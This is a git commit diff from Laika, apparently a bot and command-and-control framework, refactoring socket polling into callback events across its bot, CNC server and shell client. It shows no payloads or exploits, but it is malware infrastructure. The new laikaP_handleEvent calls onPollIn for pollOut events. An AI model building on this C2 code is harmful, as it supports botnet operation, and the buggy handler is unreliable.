1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-21 20:40:05 +00:00

Refactored polling, lpolllist.c now handles poll events & flushes the poll queue

- Sockets now have event callbacks, onPollIn, onPollOut & onPollFail. If these are set to NULL they're ignored
This commit is contained in:
CPunch 2022-03-24 10:26:06 -05:00
parent 94bcabadfd
commit 7baced7b8f
9 changed files with 110 additions and 83 deletions

View File

@ -47,6 +47,8 @@ struct sLaika_bot *laikaB_newBot(void) {
bot->peer = laikaS_newPeer( bot->peer = laikaS_newPeer(
laikaB_pktTbl, laikaB_pktTbl,
&bot->pList, &bot->pList,
NULL,
NULL,
(void*)bot (void*)bot
); );
@ -129,7 +131,7 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
void laikaB_flushQueue(struct sLaika_bot *bot) { void laikaB_flushQueue(struct sLaika_bot *bot) {
/* flush pList's outQueue */ /* flush pList's outQueue */
if (bot->pList.outCount > 0) { if (bot->pList.outCount > 0) {
if (!laikaS_handlePeerOut(bot->peer)) if (!laikaS_handlePeerOut(&bot->peer->sock))
laikaS_kill(&bot->peer->sock); laikaS_kill(&bot->peer->sock);
laikaP_resetOutQueue(&bot->pList); laikaP_resetOutQueue(&bot->pList);
@ -147,19 +149,8 @@ bool laikaB_poll(struct sLaika_bot *bot, int timeout) {
if (numEvents == 0) /* no events? timeout was reached */ if (numEvents == 0) /* no events? timeout was reached */
return false; return false;
LAIKA_TRY if (!laikaP_handleEvent(evnt))
if (evnt->pollIn && !laikaS_handlePeerIn(bot->peer)) laikaS_kill(&bot->peer->sock);
goto _BOTKILL;
if (evnt->pollOut && !laikaS_handlePeerOut(bot->peer))
goto _BOTKILL;
if (!evnt->pollIn && !evnt->pollOut)
goto _BOTKILL;
LAIKA_CATCH
_BOTKILL:
laikaS_kill(&bot->peer->sock);
LAIKA_TRYEND
/* flush any events after (eg. made by a packet handler) */ /* flush any events after (eg. made by a packet handler) */
laikaB_flushQueue(bot); laikaB_flushQueue(bot);

View File

@ -188,7 +188,7 @@ struct sLaika_cnc *laikaC_newCNC(uint16_t port) {
cnc->authPeersCount = 0; cnc->authPeersCount = 0;
/* init socket & pollList */ /* init socket & pollList */
laikaS_initSocket(&cnc->sock); laikaS_initSocket(&cnc->sock, NULL, NULL, NULL, NULL);
laikaP_initPList(&cnc->pList); laikaP_initPList(&cnc->pList);
/* bind sock to port */ /* bind sock to port */
@ -331,18 +331,11 @@ void laikaC_killPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) {
LAIKA_DEBUG("peer %p killed!\n", peer); LAIKA_DEBUG("peer %p killed!\n", peer);
} }
void laikaC_flushQueue(struct sLaika_cnc *cnc) { /* socket event */
struct sLaika_peer *peer; void laikaC_onPollFail(struct sLaika_socket *sock, void *uData) {
int i; struct sLaika_peer *peer = (struct sLaika_peer*)sock;
struct sLaika_cnc *cnc = (struct sLaika_cnc*)uData;
/* flush pList's outQueue */ laikaC_killPeer(cnc, peer);
for (i = 0; i < cnc->pList.outCount; i++) {
peer = cnc->pList.outQueue[i];
LAIKA_DEBUG("sending OUT to %p\n", peer);
if (!laikaS_handlePeerOut(peer))
laikaC_killPeer(cnc, peer);
}
laikaP_resetOutQueue(&cnc->pList);
} }
bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout) { bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout) {
@ -350,7 +343,7 @@ bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout) {
struct sLaika_pollEvent *evnts; struct sLaika_pollEvent *evnts;
int numEvents, i; int numEvents, i;
laikaC_flushQueue(cnc); laikaP_flushOutQueue(&cnc->pList);
evnts = laikaP_poll(&cnc->pList, timeout, &numEvents); evnts = laikaP_poll(&cnc->pList, timeout, &numEvents);
/* if we have 0 events, we reached the timeout, let the caller know */ /* if we have 0 events, we reached the timeout, let the caller know */
@ -364,39 +357,34 @@ bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout) {
peer = laikaS_newPeer( peer = laikaS_newPeer(
laikaC_botPktTbl, laikaC_botPktTbl,
&cnc->pList, &cnc->pList,
laikaC_onPollFail,
cnc,
(void*)laikaC_newBotInfo(cnc) (void*)laikaC_newBotInfo(cnc)
); );
/* setup and accept new peer */ LAIKA_TRY
laikaS_acceptFrom(&peer->sock, &cnc->sock, peer->ipv4); /* setup and accept new peer */
laikaS_setNonBlock(&peer->sock); laikaS_acceptFrom(&peer->sock, &cnc->sock, peer->ipv4);
laikaS_setNonBlock(&peer->sock);
/* add to our pollList */ /* add to our pollList */
laikaP_addSock(&cnc->pList, &peer->sock); laikaP_addSock(&cnc->pList, &peer->sock);
LAIKA_DEBUG("new peer %p!\n", peer); LAIKA_DEBUG("new peer %p!\n", peer);
LAIKA_CATCH
/* acceptFrom() and setNonBlock() can fail */
LAIKA_DEBUG("failed to accept peer %p!\n", peer);
laikaS_freePeer(peer);
LAIKA_TRYEND
continue; continue;
} }
peer = (struct sLaika_peer*)evnts[i].sock; peer = (struct sLaika_peer*)evnts[i].sock;
LAIKA_TRY laikaP_handleEvent(&evnts[i]);
if (evnts[i].pollIn && !laikaS_handlePeerIn(peer))
goto _CNCKILL;
if (evnts[i].pollOut && !laikaS_handlePeerOut(peer))
goto _CNCKILL;
if (!evnts[i].pollIn && !evnts[i].pollOut)
goto _CNCKILL;
LAIKA_CATCH
_CNCKILL:
laikaC_killPeer(cnc, peer);
LAIKA_TRYEND
} }
laikaC_flushQueue(cnc); laikaP_flushOutQueue(&cnc->pList);
return true; return true;
} }

View File

@ -60,7 +60,7 @@ struct sLaika_peer {
bool useSecure; /* if true, peer will transmit/receive encrypted data using inKey & outKey */ bool useSecure; /* if true, peer will transmit/receive encrypted data using inKey & outKey */
}; };
struct sLaika_peer *laikaS_newPeer(struct sLaika_peerPacketInfo *packetTbl, struct sLaika_pollList *pList, void *uData); struct sLaika_peer *laikaS_newPeer(struct sLaika_peerPacketInfo *packetTbl, struct sLaika_pollList *pList, pollFailEvent onPollFail, void *onPollFailUData, void *uData);
void laikaS_freePeer(struct sLaika_peer *peer); void laikaS_freePeer(struct sLaika_peer *peer);
void laikaS_setSecure(struct sLaika_peer *peer, bool flag); void laikaS_setSecure(struct sLaika_peer *peer, bool flag);
@ -69,7 +69,7 @@ void laikaS_startOutPacket(struct sLaika_peer *peer, LAIKAPKT_ID id);
int laikaS_endOutPacket(struct sLaika_peer *peer); int laikaS_endOutPacket(struct sLaika_peer *peer);
void laikaS_startVarPacket(struct sLaika_peer *peer, LAIKAPKT_ID id); void laikaS_startVarPacket(struct sLaika_peer *peer, LAIKAPKT_ID id);
int laikaS_endVarPacket(struct sLaika_peer *peer); int laikaS_endVarPacket(struct sLaika_peer *peer);
bool laikaS_handlePeerIn(struct sLaika_peer *peer); bool laikaS_handlePeerIn(struct sLaika_socket *sock);
bool laikaS_handlePeerOut(struct sLaika_peer *peer); bool laikaS_handlePeerOut(struct sLaika_socket *sock);
#endif #endif

View File

@ -1,6 +1,8 @@
#ifndef LAIKA_POLLLIST_H #ifndef LAIKA_POLLLIST_H
#define LAIKA_POLLLIST_H #define LAIKA_POLLLIST_H
#include <stdbool.h>
#include "laika.h" #include "laika.h"
#include "lsocket.h" #include "lsocket.h"
#include "hashmap.h" #include "hashmap.h"
@ -14,11 +16,9 @@ struct sLaika_pollEvent {
bool pollOut; bool pollOut;
}; };
struct sLaika_peer;
struct sLaika_pollList { struct sLaika_pollList {
struct hashmap *sockets; struct hashmap *sockets;
struct sLaika_peer **outQueue; /* holds peers which have data needed to be sent */ struct sLaika_socket **outQueue; /* holds sockets which have data needed to be sent */
struct sLaika_pollEvent *revents; struct sLaika_pollEvent *revents;
#ifdef LAIKA_USE_EPOLL #ifdef LAIKA_USE_EPOLL
/* epoll */ /* epoll */
@ -42,9 +42,11 @@ void laikaP_addSock(struct sLaika_pollList *pList, struct sLaika_socket *sock);
void laikaP_rmvSock(struct sLaika_pollList *pList, struct sLaika_socket *sock); void laikaP_rmvSock(struct sLaika_pollList *pList, struct sLaika_socket *sock);
void laikaP_addPollOut(struct sLaika_pollList *pList, struct sLaika_socket *sock); void laikaP_addPollOut(struct sLaika_pollList *pList, struct sLaika_socket *sock);
void laikaP_rmvPollOut(struct sLaika_pollList *pList, struct sLaika_socket *sock); void laikaP_rmvPollOut(struct sLaika_pollList *pList, struct sLaika_socket *sock);
void laikaP_pushOutQueue(struct sLaika_pollList *pList, struct sLaika_peer *peer); void laikaP_pushOutQueue(struct sLaika_pollList *pList, struct sLaika_socket *sock);
void laikaP_resetOutQueue(struct sLaika_pollList *pList); void laikaP_resetOutQueue(struct sLaika_pollList *pList);
void laikaP_flushOutQueue(struct sLaika_pollList *pList);
struct sLaika_pollEvent *laikaP_poll(struct sLaika_pollList *pList, int timeout, int *nevents); struct sLaika_pollEvent *laikaP_poll(struct sLaika_pollList *pList, int timeout, int *nevents);
bool laikaP_handleEvent(struct sLaika_pollEvent *evnt);
#endif #endif

View File

@ -1,7 +1,6 @@
#ifndef LAIKA_SOCKET_H #ifndef LAIKA_SOCKET_H
#define LAIKA_SOCKET_H #define LAIKA_SOCKET_H
/* socket/winsock headers */ /* socket/winsock headers */
#ifdef _WIN32 #ifdef _WIN32
/* windows */ /* windows */
@ -50,6 +49,7 @@
#define SOCKETERROR(x) (x == -1) #define SOCKETERROR(x) (x == -1)
#endif #endif
#include <fcntl.h> #include <fcntl.h>
#include <stdbool.h>
#include "lsodium.h" #include "lsodium.h"
@ -60,8 +60,16 @@ typedef enum {
RAWSOCK_POLL RAWSOCK_POLL
} RAWSOCKCODE; } RAWSOCKCODE;
struct sLaika_socket;
typedef bool (*pollEvent)(struct sLaika_socket *sock);
typedef void (*pollFailEvent)(struct sLaika_socket *sock, void *uData);
struct sLaika_socket { struct sLaika_socket {
SOCKET sock; /* raw socket fd */ SOCKET sock; /* raw socket fd */
pollFailEvent onPollFail;
pollEvent onPollIn;
pollEvent onPollOut;
void *uData; /* passed to onPollFail */
uint8_t *outBuf; /* raw data to be sent() */ uint8_t *outBuf; /* raw data to be sent() */
uint8_t *inBuf; /* raw data we recv()'d */ uint8_t *inBuf; /* raw data we recv()'d */
int outCount; int outCount;
@ -78,7 +86,7 @@ bool laikaS_isBigEndian(void);
void laikaS_init(void); void laikaS_init(void);
void laikaS_cleanUp(void); void laikaS_cleanUp(void);
void laikaS_initSocket(struct sLaika_socket *sock); void laikaS_initSocket(struct sLaika_socket *sock, pollEvent onPollIn, pollEvent onPollOut, pollFailEvent onPollFail, void *uData);
void laikaS_cleanSocket(struct sLaika_socket *sock); void laikaS_cleanSocket(struct sLaika_socket *sock);
void laikaS_kill(struct sLaika_socket *sock); /* kills a socket */ void laikaS_kill(struct sLaika_socket *sock); /* kills a socket */
void laikaS_connect(struct sLaika_socket *sock, char *ip, char *port); /* connect to ip & port */ void laikaS_connect(struct sLaika_socket *sock, char *ip, char *port); /* connect to ip & port */

View File

@ -2,10 +2,10 @@
#include "lmem.h" #include "lmem.h"
#include "lpeer.h" #include "lpeer.h"
struct sLaika_peer *laikaS_newPeer(struct sLaika_peerPacketInfo *pktTbl, struct sLaika_pollList *pList, void *uData) { struct sLaika_peer *laikaS_newPeer(struct sLaika_peerPacketInfo *pktTbl, struct sLaika_pollList *pList, pollFailEvent onPollFail, void *onPollFailUData, void *uData) {
struct sLaika_peer *peer = laikaM_malloc(sizeof(struct sLaika_peer)); struct sLaika_peer *peer = laikaM_malloc(sizeof(struct sLaika_peer));
laikaS_initSocket(&peer->sock); laikaS_initSocket(&peer->sock, laikaS_handlePeerIn, laikaS_handlePeerOut, onPollFail, onPollFailUData);
peer->packetTbl = pktTbl; peer->packetTbl = pktTbl;
peer->pList = pList; peer->pList = pList;
peer->uData = uData; peer->uData = uData;
@ -36,7 +36,7 @@ void laikaS_emptyOutPacket(struct sLaika_peer *peer, LAIKAPKT_ID id) {
laikaS_writeByte(sock, id); laikaS_writeByte(sock, id);
/* add to pollList's out queue */ /* add to pollList's out queue */
laikaP_pushOutQueue(peer->pList, peer); laikaP_pushOutQueue(peer->pList, &peer->sock);
} }
void laikaS_startOutPacket(struct sLaika_peer *peer, LAIKAPKT_ID id) { void laikaS_startOutPacket(struct sLaika_peer *peer, LAIKAPKT_ID id) {
@ -76,7 +76,7 @@ int laikaS_endOutPacket(struct sLaika_peer *peer) {
} }
/* add to pollList's out queue */ /* add to pollList's out queue */
laikaP_pushOutQueue(peer->pList, peer); laikaP_pushOutQueue(peer->pList, &peer->sock);
/* return packet size and prepare for next outPacket */ /* return packet size and prepare for next outPacket */
sz = sock->outCount - peer->outStart; sz = sock->outCount - peer->outStart;
@ -149,7 +149,8 @@ void laikaS_setSecure(struct sLaika_peer *peer, bool flag) {
peer->useSecure = flag; peer->useSecure = flag;
} }
bool laikaS_handlePeerIn(struct sLaika_peer *peer) { bool laikaS_handlePeerIn(struct sLaika_socket *sock) {
struct sLaika_peer *peer = (struct sLaika_peer*)sock;
RAWSOCKCODE err; RAWSOCKCODE err;
int recvd; int recvd;
@ -227,7 +228,8 @@ bool laikaS_handlePeerIn(struct sLaika_peer *peer) {
return laikaS_isAlive((&peer->sock)); return laikaS_isAlive((&peer->sock));
} }
bool laikaS_handlePeerOut(struct sLaika_peer *peer) { bool laikaS_handlePeerOut(struct sLaika_socket *sock) {
struct sLaika_peer *peer = (struct sLaika_peer*)sock;
RAWSOCKCODE err; RAWSOCKCODE err;
int sent; int sent;

View File

@ -150,23 +150,37 @@ void laikaP_rmvPollOut(struct sLaika_pollList *pList, struct sLaika_socket *sock
#endif #endif
} }
void laikaP_pushOutQueue(struct sLaika_pollList *pList, struct sLaika_peer *peer) { void laikaP_pushOutQueue(struct sLaika_pollList *pList, struct sLaika_socket *sock) {
int i; int i;
/* first, check that we don't have this peer in the queue already */ /* first, check that we don't have this peer in the queue already */
for (i = 0; i < pList->outCount; i++) { for (i = 0; i < pList->outCount; i++) {
if (pList->outQueue[i] == peer) if (pList->outQueue[i] == sock)
return; /* found it :) */ return; /* found it :) */
} }
laikaM_growarray(struct sLaika_peer*, pList->outQueue, 1, pList->outCount, pList->outCap); laikaM_growarray(struct sLaika_socket*, pList->outQueue, 1, pList->outCount, pList->outCap);
pList->outQueue[pList->outCount++] = peer; pList->outQueue[pList->outCount++] = sock;
} }
void laikaP_resetOutQueue(struct sLaika_pollList *pList) { void laikaP_resetOutQueue(struct sLaika_pollList *pList) {
pList->outCount = 0; /* ez lol */ pList->outCount = 0; /* ez lol */
} }
void laikaP_flushOutQueue(struct sLaika_pollList *pList) {
struct sLaika_socket *sock;
int i;
/* flush pList's outQueue */
for (i = 0; i < pList->outCount; i++) {
sock = pList->outQueue[i];
LAIKA_DEBUG("sending OUT to %p\n", sock);
if (sock->onPollOut && !sock->onPollOut(sock) && sock->onPollFail)
sock->onPollFail(sock, sock->uData);
}
laikaP_resetOutQueue(pList);
}
struct sLaika_pollEvent *laikaP_poll(struct sLaika_pollList *pList, int timeout, int *_nevents) { struct sLaika_pollEvent *laikaP_poll(struct sLaika_pollList *pList, int timeout, int *_nevents) {
int nEvents, i; int nEvents, i;
@ -219,4 +233,31 @@ struct sLaika_pollEvent *laikaP_poll(struct sLaika_pollList *pList, int timeout,
/* return revents array */ /* return revents array */
return pList->revents; return pList->revents;
}
bool laikaP_handleEvent(struct sLaika_pollEvent *evnt) {
bool result = true;
/* sanity check */
if (evnt->sock->onPollIn == NULL || evnt->sock->onPollOut == NULL)
return result;
LAIKA_TRY
if (evnt->pollIn && !evnt->sock->onPollIn(evnt->sock))
goto _PHNDLEEVNTFAIL;
if (evnt->pollOut && !evnt->sock->onPollIn(evnt->sock))
goto _PHNDLEEVNTFAIL;
if (!evnt->pollIn && !evnt->pollOut)
goto _PHNDLEEVNTFAIL;
LAIKA_CATCH
_PHNDLEEVNTFAIL:
/* call onFail event */
if (evnt->sock->onPollFail)
evnt->sock->onPollFail(evnt->sock, evnt->sock->uData);
result = false;
LAIKA_TRYEND
return result;
} }

View File

@ -37,8 +37,12 @@ void laikaS_cleanUp(void) {
#endif #endif
} }
void laikaS_initSocket(struct sLaika_socket *sock) { void laikaS_initSocket(struct sLaika_socket *sock, pollEvent onPollIn, pollEvent onPollOut, pollFailEvent onPollFail, void *uData) {
sock->sock = INVALID_SOCKET; sock->sock = INVALID_SOCKET;
sock->onPollFail = onPollFail;
sock->onPollIn = onPollIn;
sock->onPollOut = onPollOut;
sock->uData = uData;
sock->inBuf = NULL; sock->inBuf = NULL;
sock->inCap = ARRAY_START; sock->inCap = ARRAY_START;
sock->inCount = 0; sock->inCount = 0;

View File

@ -142,6 +142,8 @@ void shellC_init(tShell_client *client) {
client->peer = laikaS_newPeer( client->peer = laikaS_newPeer(
shellC_pktTbl, shellC_pktTbl,
&client->pList, &client->pList,
NULL,
NULL,
(void*)client (void*)client
); );
@ -223,7 +225,7 @@ void shellC_connectToCNC(tShell_client *client, char *ip, char *port) {
void shellC_flushQueue(tShell_client *client) { void shellC_flushQueue(tShell_client *client) {
/* flush pList's outQueue */ /* flush pList's outQueue */
if (client->pList.outCount > 0) { if (client->pList.outCount > 0) {
if (!laikaS_handlePeerOut(client->peer)) if (!laikaS_handlePeerOut(&client->peer->sock))
laikaS_kill(&client->peer->sock); laikaS_kill(&client->peer->sock);
laikaP_resetOutQueue(&client->pList); laikaP_resetOutQueue(&client->pList);
@ -241,19 +243,8 @@ bool shellC_poll(tShell_client *client, int timeout) {
if (numEvents == 0) /* no events? timeout was reached */ if (numEvents == 0) /* no events? timeout was reached */
return false; return false;
LAIKA_TRY if (!laikaP_handleEvent(evnt))
if (evnt->pollIn && !laikaS_handlePeerIn(client->peer)) laikaS_kill(&client->peer->sock);
goto _CLIENTKILL;
if (evnt->pollOut && !laikaS_handlePeerOut(client->peer))
goto _CLIENTKILL;
if (!evnt->pollIn && !evnt->pollOut) /* not a pollin or pollout event, must be an error */
goto _CLIENTKILL;
LAIKA_CATCH
_CLIENTKILL:
laikaS_kill(&client->peer->sock);
LAIKA_TRYEND
/* flush any events after (eg. made by a packet handler) */ /* flush any events after (eg. made by a packet handler) */
shellC_flushQueue(client); shellC_flushQueue(client);